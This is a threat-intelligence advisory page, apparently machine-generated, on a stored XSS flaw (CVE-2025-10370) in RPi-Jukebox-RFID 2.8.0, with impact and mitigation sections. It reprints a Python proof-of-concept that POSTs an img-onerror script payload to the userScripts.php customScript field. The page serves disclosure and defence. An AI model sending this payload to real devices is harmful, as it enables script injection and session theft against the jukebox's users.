RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
AI Analysis
Technical Summary
The RPi-Jukebox-RFID 2.8.0 software suffers from a stored Cross-Site Scripting (XSS) vulnerability. Stored XSS occurs when malicious input is saved by the application and later rendered in a web page without proper sanitization or encoding, allowing attackers to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session hijacking, credential theft, or unauthorized actions performed on behalf of the user. The vulnerability affects the web interface of RPi-Jukebox-RFID, a popular open-source project used to control music playback on Raspberry Pi devices via RFID tags. Although no specific affected versions are listed, the issue is identified in version 2.8.0. The exploit code is publicly available in Python, facilitating automated attacks or proof-of-concept demonstrations. No patch links are provided, indicating that users may need to monitor the project for updates or apply manual mitigations. The vulnerability does not require advanced privileges to exploit but typically requires a victim to interact with the malicious payload. The medium severity rating reflects the moderate impact on confidentiality and integrity, with limited availability impact. The lack of known exploits in the wild suggests it is not yet widely weaponized but remains a credible threat to users of this software.
Potential Impact
This stored XSS vulnerability can compromise the confidentiality and integrity of user sessions by allowing attackers to execute arbitrary scripts within the victim's browser. Potential impacts include theft of session cookies, enabling account takeover, unauthorized control of the jukebox interface, or injection of malicious content that could spread further attacks. For organizations or individuals using RPi-Jukebox-RFID in public or shared environments, this could lead to unauthorized access or disruption of service. While the scope is limited to users of this specific software, the availability of exploit code lowers the barrier for attackers. The impact is primarily on user trust and data security rather than system-wide availability or critical infrastructure, but it can still cause significant operational disruption in affected environments.
Mitigation Recommendations
Users should immediately monitor the RPi-Jukebox-RFID project for official patches addressing this XSS vulnerability. In the absence of a patch, implement strict input validation and output encoding on all user-supplied data rendered in the web interface to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Limit access to the web interface to trusted networks or authenticated users to reduce exposure. Regularly audit and sanitize stored data that could contain malicious scripts. Educate users about the risks of interacting with untrusted content within the jukebox interface. Consider deploying web application firewalls (WAF) that can detect and block XSS payloads targeting this application. Finally, maintain up-to-date backups to recover from potential compromise.
Affected Countries
United States, Germany, United Kingdom, Canada, Australia, Netherlands, France, Japan, India, Brazil
Indicators of Compromise
- exploit-code: # Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370) # Date: 2025-09-25 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0 # Version: 2.8.0 # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0 # CVE: CVE-2025-10370 # # Description: # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page. # The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection # of arbitrary JavaScript payloads. import requests # Change this to the actual IP or hostname of the target device TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php" # The XSS payload PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>' # HTTP headers headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", "Referer": TARGET, } # POST data with the malicious payload data = { "customScript": PAYLOAD } def send_exploit(): print(f"[+] Sending XSS payload to {TARGET}") try: r = requests.post(TARGET, headers=headers, data=data, timeout=5) print(f"[+] Payload sent. Status code: {r.status_code}") print("[*] If the target is vulnerable, the payload will execute when the page is rendered.") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": send_exploit()
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
Description
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The RPi-Jukebox-RFID 2.8.0 software suffers from a stored Cross-Site Scripting (XSS) vulnerability. Stored XSS occurs when malicious input is saved by the application and later rendered in a web page without proper sanitization or encoding, allowing attackers to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session hijacking, credential theft, or unauthorized actions performed on behalf of the user. The vulnerability affects the web interface of RPi-Jukebox-RFID, a popular open-source project used to control music playback on Raspberry Pi devices via RFID tags. Although no specific affected versions are listed, the issue is identified in version 2.8.0. The exploit code is publicly available in Python, facilitating automated attacks or proof-of-concept demonstrations. No patch links are provided, indicating that users may need to monitor the project for updates or apply manual mitigations. The vulnerability does not require advanced privileges to exploit but typically requires a victim to interact with the malicious payload. The medium severity rating reflects the moderate impact on confidentiality and integrity, with limited availability impact. The lack of known exploits in the wild suggests it is not yet widely weaponized but remains a credible threat to users of this software.
Potential Impact
This stored XSS vulnerability can compromise the confidentiality and integrity of user sessions by allowing attackers to execute arbitrary scripts within the victim's browser. Potential impacts include theft of session cookies, enabling account takeover, unauthorized control of the jukebox interface, or injection of malicious content that could spread further attacks. For organizations or individuals using RPi-Jukebox-RFID in public or shared environments, this could lead to unauthorized access or disruption of service. While the scope is limited to users of this specific software, the availability of exploit code lowers the barrier for attackers. The impact is primarily on user trust and data security rather than system-wide availability or critical infrastructure, but it can still cause significant operational disruption in affected environments.
Mitigation Recommendations
Users should immediately monitor the RPi-Jukebox-RFID project for official patches addressing this XSS vulnerability. In the absence of a patch, implement strict input validation and output encoding on all user-supplied data rendered in the web interface to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Limit access to the web interface to trusted networks or authenticated users to reduce exposure. Regularly audit and sanitize stored data that could contain malicious scripts. Educate users about the risks of interacting with untrusted content within the jukebox interface. Consider deploying web application firewalls (WAF) that can detect and block XSS payloads targeting this application. Finally, maintain up-to-date backups to recover from potential compromise.
Technical Details
- Edb Id
- 52470
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370) # Date: 2025-09-25 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0 # Version: 2.8.0 # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0 # CVE: CVE-2025-10370 # # Description: # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page. # The vulnerab... (1006 more characters)
Threat ID: 6981b62cf9fa50a62fb22400
Added to database: 2/3/2026, 8:47:40 AM
Last enriched: 2/28/2026, 3:05:10 PM
Last updated: 3/23/2026, 2:40:11 PM
Views: 80
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.